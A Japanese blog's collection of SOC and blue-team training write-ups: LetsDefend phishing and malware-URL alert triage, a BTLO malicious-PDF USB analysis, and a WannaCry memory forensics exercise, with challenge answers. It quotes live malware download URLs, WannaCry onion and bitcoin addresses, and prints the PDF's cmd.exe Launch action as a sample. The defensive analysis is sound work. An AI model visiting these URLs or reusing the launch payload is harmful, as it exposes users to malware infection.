LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 27
Details
EventID: 27
Event Time: Oct. 29, 2020, 7:25 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 146.56.209.252
Source Address ndt@zol.co.zw
Destination Address susie@letsdefend.io
E-mail Subject UPS Your Packages Status Has Changed
Device Action Blocked
playbook
Are there attachments or URLs in the email?
Answer:Yes
Analyze Url/Attachment
Sender IP 146.56.209.252
VirusTotal: https://www.virustotal.com/gui/ip-address/146.56.209.252/detection
AbuseIPDB: https://www.abuseipdb.com/check/146.56.209.252
ip-sc: https://ip-sc.net/ja/r/146.56.209.252
ip元は中国でShenzhen Tencent。SSHブルートフォース元として利用されている。
Sender Domain zol.co[.]zw
Hybrid-Analysis: https://www.hybrid-analysis.com/search?query=zol.co.zw
怪しいドメインではある。
UPS Your Packages Status Has Changed From: ndt@zol.co.zw Oct. 29, 2020, 7:25 p.m. To: susie@letsdefend.io Oct. 29, 2020, 7:25 p.m. You have received a secure message from a Veterans United Employee. Click below link by 2020-11-14 14:30 CDT to read your message. After that, open attachment. https://hredoybangladesh.com/content/docs/wvoiha4vd1aqty/
URL link: https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/
VirusTotal: https://www.virustotal.com/gui/url/2825a389272fd0e4b9923c98644a1786d4019ec7002c0a718b59dbe6d713a889
URLhaus: https://urlhaus.abuse.ch/url/698975/
現在はページ確認できないために分からないが、VTのレポートからはマルウェアダウンロードURLであるとのレポートがあり、URLhausからemotetやheodoに関連するとの報告がある。
URLhausにおいて報告されているリンクに関連するファイルとして最も新しいものは,
VirusTotal: https://www.virustotal.com/gui/file/360a5cb7eed923017b4ef07460e7652362cdf1fc0a902516addbb8e244e30134/detection/f-360a5cb
このファイルと同じハッシュのものをANYRUNで探すと、
ANYRUN: https://app.any.run/tasks/989ac1f3-9d9e-4854-80c1-f65b1b8cd1a2/
マクロからpowershellの実行、ダウンロードしたものを実行し、C2サーバとの連携や自動起動設定等々を行っている。
hredoybangladesh[.]com
ドメインもいくつかのベンダーに登録されている。
VirusTotal: https://www.virustotal.com/gui/domain/hredoybangladesh.com/detection
Answer:Malicious
Check If Mail Delivered to User?
Device Action Blocked
Answer: Not Delivered
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| ndt@zol.co.zw | E-mail Sender | 146.56.209.252 |
| https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/ | URL Address | download link(emotet,heodo) |
End
LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28
Details
EventID: 28
Event Time: Oct. 29, 2020, 7:34 p.m.
Rule: SOC105 - Requested T.I. URL address
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 115.99.150.132
Username Bill
Request URL http[:]//115.99.150.132:56841/Mozi.m
User Agent Firewall Test - Dont Block
Device Action Blocked
playbook
Analyze Threat Intel Data
http[:]//115.99.150.132:56841/Mozi.m
VirusTotal: https://www.virustotal.com/gui/url/95f3eda1ff810022df76400ab1d5f2e4ac44817f116678132486fc92ec6aab46
URLhaus: https://urlhaus.abuse.ch/url/748225/
VTでは有名どころのベンダーによってMalicious判定されているためURLは怪しい。
URLhausにあるためにURLは間違いなくマルウェアに関連している。
Download file Mozi.m
- b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605
VirusTotal 42/61: https://www.virustotal.com/gui/file/b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605/detection/f-b5cf68c
実際のファイルが取得できなかったために中身は分からないがelfファイルのようだ。VTからもMaliciousである。
Answer: Malicious
Interaction with TI data
Log search
| DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|
| Oct, 29, 2020, 07:34 PM | Proxy | 172.16.17.47 | 46938 | 115.99.150.132 | 56841 |
Request URL: http://115.99.150.132:56841/Mozi.m Request Method: GET Device Action: Blocked Process: chrome.exe Parent Process: explorer.exe Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e
アクセスはブロックされている。
Endpointには手がかりは見つからなかった。
Answer: Not Accessed
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| http[:]//115.99.150.132:56841/Mozi.m | URL Address | download malware |
| a73ddd6ec22462db955439f665cad4e6 | MD5 Hash | Mozi.m - elf malware? |
End
古いアラートは面白みが無い。
LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 29
Details
EventID: 29
Event Time: Oct. 29, 2020, 7:43 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 191.233.193.73
Source Address icianb@hotmail.com
Destination Address sofia@letsdefend.io
E-mail Subject Invoice
Device Action Blocked
playbook
Are there attachments or URLs in the email?
Invoice From: icianb@hotmail.com Oct. 29, 2020, 7:43 p.m. To: sofia@letsdefend.io Oct. 29, 2020, 7:43 p.m. Hello, Attached copy of your unpaid invoice & Statement Our Statement shows 2 invoices are paid. Our AP did confirmed payment was paid on the 13th of October into your Bank account. Thank you. Attachments: 4abd5dd8377e5810116f3665bd8d92f0.zip
Answer:Yes
Analyze Url/Attachment
メール元はhotmailなので何とも言えず。今回問題はAttachmentsにありそうだ。
$ sha256sum 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe
VirusTotal 35/68: https://www.virustotal.com/gui/file/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/detection
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/5f9d102805f963128371eff5
とりあえずのところMaliciousで問題は無い。network device lookupを行っているのも怪しいと。VTにはAPT Scannerであるというレポートがある。
Answer:Malicious
Check If Mail Delivered to User?
Device Action Blocked
Answer:Not Delivered
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| icianb@hotmail.com | E-mail Sender | 191.233.193.73 |
| 4abd5dd8377e5810116f3665bd8d92f0 | MD5 Hash | APT Scanner? Malicious by VT |
End
BTLO Challenge Suspicious USB Stick(Retired Challenge) write up
BTLO Challenge Suspicious USB Stick(Retired Challenge)
- Scenario
- Challenge Submission
- 1. What file is the autorun.inf running? (3 points)
- 2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
- 3. Does the file have the correct magic number? (2 points)
- 4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
- 5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
- 6. How many suspicious /OpenAction elements does the file have? (5 points)
Scenario
One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?
Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.
Challenge Submission
1. What file is the autorun.inf running? (3 points)
Format: filename.extension
$ cat autorun.inf [autorun] open=README.pdf icon=autorun.ico
Answer: README.pdf
2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
True or False
SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43 https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
38/59
Answer: False
3. Does the file have the correct magic number? (2 points)
True or False
$ file README.pdf README.pdf: PDF document, version 1.7 $ hexdump -C README.pdf | head 00000000 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d |%PDF-1.7..%.....| 00000010 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 |.1 0 obj..<</Typ| 00000020 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 |e/Catalog/Pages | 00000030 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 |2 0 R/Lang(en-US| 00000040 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f |) /StructTreeRoo| 00000050 74 20 31 30 20 30 20 52 2f 4d 61 72 6b 49 6e 66 |t 10 0 R/MarkInf| 00000060 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e |o<</Marked true>| 00000070 3e 2f 4d 65 74 61 64 61 74 61 20 32 30 20 30 20 |>/Metadata 20 0 | 00000080 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e |R/ViewerPreferen| 00000090 63 65 73 20 32 31 20 30 20 52 3e 3e 0d 0a 65 6e |ces 21 0 R>>..en|
Answer: True
4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
Operating System
$ pdfinfo README.pdf
Creator: StarMan
CreationDate: Thu Feb 11 02:54:49 2021 EST
ModDate: Thu Feb 11 02:54:49 2021 EST
Tagged: yes
UserProperties: no
Suspects: no
Form: none
Syntax Warning: Bad launch-type link action
JavaScript: no
Pages: 1
Encrypted: no
Page size: 612 x 792 pts (letter)
Page rot: 0
File size: 136561 bytes
Optimized: no
PDF version: 1.7
$ pdfid README.pdf
PDFiD 0.2.7 README.pdf
PDF Header: %PDF-1.7
obj 25
endobj 25
stream 7
endstream 7
xref 4
trailer 4
startxref 4
/Page 2
/Encrypt 0
/ObjStm 1
/JS 1
/JavaScript 1
/AA 1
/OpenAction 1
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 1
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
$ pdf-parser -a README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
8: 4, 9, 18, 19, 21, 24, 26, 9
/Action 2: 27, 28
/Catalog 2: 1, 1
/ExtGState 2: 7, 8
/Filespec 1: 25
/Font 1: 5
/FontDescriptor 1: 6
/Metadata 2: 20, 20
/ObjStm 1: 17
/Page 2: 3, 3
/Pages 1: 2
/XRef 1: 22
Search keywords:
/JS 1: 27
/JavaScript 1: 27
/AA 1: 3
/OpenAction 1: 1
/Launch 1: 28
# /JS,/JavaScript,/OpenAction,/Launchのチェック
$ pdf-parser -o 27 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
Type: /Action
Referencing:
<<
/S /JavaScript
/JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
/Type /Action
>>
$ pdf-parser -o 1 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
Type: /Catalog
Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R
<<
/Type /Catalog
/Pages 2 0 R
/Lang (en-US)
/StructTreeRoot 10 0 R
/MarkInfo
<<
/Marked true
>>
/Metadata 20 0 R
/ViewerPreferences 21 0 R
>>
obj 1 0
Type: /Catalog
Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R
<<
/Type /Catalog
/Pages 2 0 R
/Names 23 0 R
/OpenAction 27 0 R
/Lang (en-US)
/StructTreeRoot 10 0 R
/MarkInfo
<<
/Marked true
>>
/Metadata 20 0 R
/ViewerPreferences 21 0 R
>>
$ pdf-parser -o 28 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
Type: /Action
Referencing:
<<
/S /Launch
/Type /Action
/Win
<<
/F (cmd.exe)
/D '(c:\\\\windows\\\\system32)'
/P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
>>
>>
Answer: windows
5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
Format: filename.exe
$ pdf-parser -o 28 README.pdfの結果より、
Answer: cmd.exe
6. How many suspicious /OpenAction elements does the file have? (5 points)
$ pdfid README.pdfの結果、そしてobj 1の/OpenAction 27と怪しいJavaScriptの実行がある。
Answer: 1
BTLO Challenge Memory Analysis - Ransomware(Retired Challenge) write up
BTLOを始めてみました。
このサービスでは防御分野Blue Teamの実践的なスキルを用意されたファイルとシナリオに沿って学べます。環境が用意されているInvestigationsとファイルが渡されて解析を行うChallengesがあります。
サービスの規約により、RetiredとなったInvestigationsとChallengesはwrite upを公開しても良いです。今回は、Challengesの内のMemory Analysis - Ransomwareのwrite upです。
BTLO Challenge Memory Analysis - Ransomware(Retired Challenge)
- Scenario
- Challenge Submission
- 1. Run “vol.py -f infected.vmem --profile=Win7SP1x86 psscan” that will list all processes. What is the name of the suspicious process?
- 2. What is the parent process ID for the suspicious process?
- 3. What is the initial malicious executable that created this process?
- 4. If you drill down on the suspicious PID (vol.py -f infected.vmem --profile=Win7SP1x86 psscan | grep (PIDhere)), find the process used to delete files
- 5. Find the path where the malicious file was first executed
- 6. Can you identify what ransomware it is? (Do your research!)
- 7. What is the filename for the file with the ransomware public key that was used to encrypt the private key? (.eky extension)
Scenario
The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any files on his computer and keeps receiving a pop-up stating that his files have been encrypted. You disconnected the computer from the network and extracted the memory dump of his machine and started analyzing it with Volatility. Continue your investigation to uncover how the ransomware works and how to stop it!
Challenge Submission
今回のメモリダンプ
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/volatility/BTLO/BTLO Memory Analysis - Ransomware/infected.vmem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82948c28L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82949c00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-01-31 18:24:57 UTC+0000
Image local date and time : 2021-01-31 13:24:57 -0500
1. Run “vol.py -f infected.vmem --profile=Win7SP1x86 psscan” that will list all processes. What is the name of the suspicious process?
Format: @ProcessName
$ vol.py -f infected.vmem --profile=Win7S P1x86 psscan Volatility Foundation Volatility Framework 2.6.1 Offset(P) Name PID PPID PDB Time created Time exited ------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------ 0x000000000be92b88 dwm.exe 1424 856 0x1e6d92e0 2021-01-31 18:01:12 UTC+0000 0x000000001dc0fd40 svchost.exe 688 496 0x1e6d9140 2021-01-31 18:01:11 UTC+0000 0x000000001dc22520 svchost.exe 736 496 0x1e6d9160 2021-01-31 18:01:11 UTC+0000 0x000000001dc33030 taskhsvc.exe 2968 2924 0x1e6d92c0 2021-01-31 18:02:20 UTC+0000 0x000000001dc58030 svchost.exe 856 496 0x1e6d91a0 2021-01-31 18:01:11 UTC+0000 0x000000001dc6d548 svchost.exe 896 496 0x1e6d91c0 2021-01-31 18:01:11 UTC+0000 0x000000001dc92a88 svchost.exe 1000 496 0x1e6d9200 2021-01-31 18:01:11 UTC+0000 0x000000001dca9030 svchost.exe 1068 496 0x1e6d9220 2021-01-31 18:01:12 UTC+0000 0x000000001dcd6030 spoolsv.exe 1196 496 0x1e6d9240 2021-01-31 18:01:12 UTC+0000 0x000000001dcd91c8 svchost.exe 2204 496 0x1e6d95e0 2021-01-31 18:03:14 UTC+0000 0x000000001dd07290 svchost.exe 1252 496 0x1e6d9280 2021-01-31 18:01:12 UTC+0000 0x000000001dd32cb0 taskhost.exe 1348 496 0x1e6d92a0 2021-01-31 18:01:12 UTC+0000 0x000000001df45030 csrss.exe 404 388 0x1e6d9040 2021-01-31 18:01:11 UTC+0000 0x000000001df5a450 svchost.exe 2380 496 0x1e6d9560 2021-01-31 18:03:15 UTC+0000 0x000000001df5f030 services.exe 496 396 0x1e6d9080 2021-01-31 18:01:11 UTC+0000 0x000000001df63030 winlogon.exe 460 388 0x1e6d90c0 2021-01-31 18:01:11 UTC+0000 0x000000001df72958 lsass.exe 504 396 0x1e6d90e0 2021-01-31 18:01:11 UTC+0000 0x000000001df74030 lsm.exe 512 396 0x1e6d9100 2021-01-31 18:01:11 UTC+0000 0x000000001df975b0 svchost.exe 2508 496 0x1e6d9420 2021-01-31 18:21:28 UTC+0000 0x000000001dfc25f8 conhost.exe 2976 404 0x1e6d94e0 2021-01-31 18:02:20 UTC+0000 0x000000001dfcf108 powercfg.exe 3304 496 0x1e6d9460 2021-01-31 18:23:23 UTC+0000 2021-01-31 18:24:24 UTC+0000 0x000000001dfe2b08 svchost.exe 620 496 0x1e6d9120 2021-01-31 18:01:11 UTC+0000 0x000000001e178968 csrss.exe 356 340 0x1e6d9060 2021-01-31 18:01:11 UTC+0000 0x000000001e1801f8 wininit.exe 396 340 0x1e6d90a0 2021-01-31 18:01:11 UTC+0000 0x000000001e992a88 taskdl.exe 4060 2732 0x1e6d9540 2021-01-31 18:24:54 UTC+0000 2021-01-31 18:24:54 UTC+0000 0x000000001ec3ea58 WmiPrvSE.exe 1296 620 0x1e6d9400 2021-01-31 18:01:14 UTC+0000 0x000000001ec424a0 svchost.exe 2032 496 0x1e6d93a0 2021-01-31 18:01:13 UTC+0000 0x000000001ec81d40 dllhost.exe 1740 496 0x1e6d9440 2021-01-31 18:01:14 UTC+0000 0x000000001ed0a030 SearchFilterHo 3008 2232 0x1e6d9620 2021-01-31 18:23:00 UTC+0000 0x000000001ed3d940 WmiPrvSE.exe 208 620 0x1e6d9520 2021-01-31 18:24:23 UTC+0000 0x000000001ed5ead8 SearchProtocol 2304 2232 0x1e6d9180 2021-01-31 18:01:18 UTC+0000 0x000000001ee6a030 explorer.exe 1456 1408 0x1e6d9300 2021-01-31 18:01:12 UTC+0000 0x000000001ee80a48 VGAuthService. 1560 496 0x1e6d9320 2021-01-31 18:01:12 UTC+0000 0x000000001eef9d40 vm3dservice.ex 1688 1456 0x1e6d9340 2021-01-31 18:01:12 UTC+0000 0x000000001ef04498 vmtoolsd.exe 1700 1456 0x1e6d9360 2021-01-31 18:01:12 UTC+0000 0x000000001ef11030 vmtoolsd.exe 1720 496 0x1e6d9380 2021-01-31 18:01:13 UTC+0000 0x000000001ef28a78 msdtc.exe 2044 496 0x1e6d93c0 2021-01-31 18:01:16 UTC+0000 0x000000001ef9ed40 @WanaDecryptor 2688 2732 0x1e6d9460 2021-01-31 18:24:49 UTC+0000 2021-01-31 18:24:49 UTC+0000 0x000000001efb5418 smss.exe 268 4 0x1e6d9020 2021-01-31 18:01:10 UTC+0000 0x000000001efc1d40 SearchIndexer. 2232 496 0x1e6d9260 2021-01-31 18:01:18 UTC+0000 0x000000001fcbc0f0 sppsvc.exe 2432 496 0x1e6d9580 2021-01-31 18:03:14 UTC+0000 0x000000001fcc6800 @WanaDecryptor 3968 2732 0x1e6d95c0 2021-01-31 18:02:48 UTC+0000 0x000000001fcd4350 or4qtckT.exe 2732 1456 0x1e6d94c0 2021-01-31 18:02:16 UTC+0000 0x000000001fff1c40 System 4 0 0x00185000 2021-01-31 20:56:12 UTC+0000 0x000000001fff6920 System 4 0 0x00185000 2021-01-31 18:01:10 UTC+0000
Answer: @WanaDecryptor
2. What is the parent process ID for the suspicious process?
Parent Process ID (PPID)
Answer: 2732
3. What is the initial malicious executable that created this process?
Format: filename.exe
2732は、or4qtckT.exe
Answer: or4qtckT.exe
4. If you drill down on the suspicious PID (vol.py -f infected.vmem --profile=Win7SP1x86 psscan | grep (PIDhere)), find the process used to delete files
Format: filename.extension
$ vol.py -f infected.vmem --profile=Win7SP1x86 psscan | grep 2732 Volatility Foundation Volatility Framework 2.6.1 0x000000001e992a88 taskdl.exe 4060 2732 0x1e6d9540 2021-01-31 18:24:54 UTC+0000 2021-01-31 18:24:54 UTC+0000 0x000000001ef9ed40 @WanaDecryptor 2688 2732 0x1e6d9460 2021-01-31 18:24:49 UTC+0000 2021-01-31 18:24:49 UTC+0000 0x000000001fcc6800 @WanaDecryptor 3968 2732 0x1e6d95c0 2021-01-31 18:02:48 UTC+0000 0x000000001fcd4350 or4qtckT.exe 2732 1456 0x1e6d94c0 2021-01-31 18:02:16 UTC+0000
Answer: taskdl.exe
5. Find the path where the malicious file was first executed
Format: drive:\path\to\filename.extension
$ vol.py -f infected.vmem --profile=Win7SP1x86 cmdline Volatility Foundation Volatility Framework 2.6.1 ************************************************************************ System pid: 4 ************************************************************************ smss.exe pid: 268 Command line : \SystemRoot\System32\smss.exe ************************************************************************ (snip) or4qtckT.exe pid: 2732 Command line : "C:\Users\hacker\Desktop\or4qtckT.exe" ************************************************************************ (snip) # または $ vol.py -f infected.vmem --profile=Win7SP1x86 filescan | grep or4qtckT.exe Volatility Foundation Volatility Framework 2.6.1 0x000000001ed75ae8 7 0 R--r-- \Device\HarddiskVolume1\Users\hacker\Desktop\or4qtckT.exe 0x000000001fcaf798 3 0 R--r-d \Device\HarddiskVolume1\Users\hacker\Desktop\or4qtckT.exe
Answer: C:\Users\hacker\Desktop\or4qtckT.exe
6. Can you identify what ransomware it is? (Do your research!)
Ransomware Name
@WanaDecryptor? Hum....
Answer: wannacry
7. What is the filename for the file with the ransomware public key that was used to encrypt the private key? (.eky extension)
$ strings infected.vmem | grep "*.eky" 00000000.eky %08X.eky 00000000.eky ntor-onion-key U4/KcG1psOjpLuE8cd8qI6zQ/52YTJaLX9WbxekySk0= s+3Uc4gjE2RJhXkvwi6t1sUJmogfMlxLDDiXSpXekyHwVurAv/3yB6EPaRoujh1t MIGJAoGBAPWZYCeKAn1MnwQjFNDim2Ie2eU6hDfDsaeky54mh8bJGIh1DgF2NJUL 3vmi1rxFkeazE6PEt6zZOYi/X2hcEpKmgTr+iLG/qPu7v/x6pp0OHR8cxUc1ekyW %08X.eky %08X.eky $ strings infected.vmem | grep -n5 "00000000.eky" 183656-$02930FFEB87968D518101EB79202F1C3766078DA 183657-$109242967F596F4E3BF3D6996109EFF340FECB27 183658-Wur6 183659- or4qtckT.exe 183660-00000000.res 183661:00000000.eky 183662-00000000.res 183663-00000000.res 183664-00000000.res 183665-00000000.pky 183666-00000000.res -- 1488780-13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 1488781-gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion; 1488782-https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip 1488783-00000000.res 1488784-00000000.pky 1488785:00000000.eky 1488786-( ) 1488787-'k,k,^K^K 1488788-( ) 1488789-'k,k,^K^K 1488790-( ) # 00000000.ekyはor4qtckT.exeと関連がありそう。 $ vol.py -f infected.vmem --profile=Win7SP1x86 dumpfiles -D output/ -p 2732 Volatility Foundation Volatility Framework 2.6.1 DataSectionObject 0x83ea6268 2732 \Device\HarddiskVolume1\Users\hacker\Desktop\00000000.eky SharedCacheMap 0x83ea6268 2732 \Device\HarddiskVolume1\Users\hacker\Desktop\00000000.eky ImageSectionObject 0x991ffeb8 2732 (snip) # 00000000.ekyがor4qtckT.exeで使われている。
Answer: 00000000.eky
